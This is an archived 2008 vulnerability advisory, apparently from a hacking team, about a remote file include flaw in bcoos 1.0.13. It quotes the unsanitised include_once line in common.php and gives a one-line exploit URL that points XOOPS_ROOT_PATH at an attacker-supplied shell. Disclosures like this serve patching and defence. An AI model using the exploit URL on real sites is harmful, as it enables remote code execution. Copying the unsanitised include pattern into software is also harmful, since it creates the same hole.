Computer Security

Security Advisory: bcoos 1.0.13 Remote File Include Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :)

  vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability

  SiteEngine 5.x Multiple Remote Vulnerabilities

  iPei cross site scripting Vulnerablity

From:Cru3l.b0y_(at)_gmail.com <Cru3l.b0y_(at)_gmail.com>
Date:28.10.2008
Subject:bcoos 1.0.13 Remote File Include Vulnerability

       ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
       +                                                                        +
       +            bcoos 1.0.13 Remote File Include Vulnerability          +
       +                                                                    +
       +                   Discovered by DeltahackingTEAM                   +
       +                                                                    +
       +                        WwW.DeltaHacking.Net                        +
       +                                                                    +
       +                                                                    +
       +                                                                    +
       ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


               
AUTHOR : DeltahackingTEAM
DATE   : 26 oct 2008
SITE   : WwW.DeltaHacking.Net


#################################################################################
##
APPLICATION : bcoos
VERSION     : 1.0.13
DOWNLOAD    : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
VENDOR      : http://www.bcoos.net/
Contact     : Cru3l.b0y@deltahacking.net
#################################################################################
##


Vulnerable Code :
#############################################################################
/include/common.php

        include_once(XOOPS_ROOT_PATH.'/modules/system/cache/config.
php');


[+]Exploit: http://[t4rg3t]/[p4th]/include/common.php?XOOPS_ROOT_PATH=shell
#############################################################################


#################################################################################
#######################
# Greetings: Dr.Trojan, Sasha, PLATEN, h3x73l, smartieuser, b3hz4d and all member in DeltaHacking.Net  #
#################################################################################
#######################
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru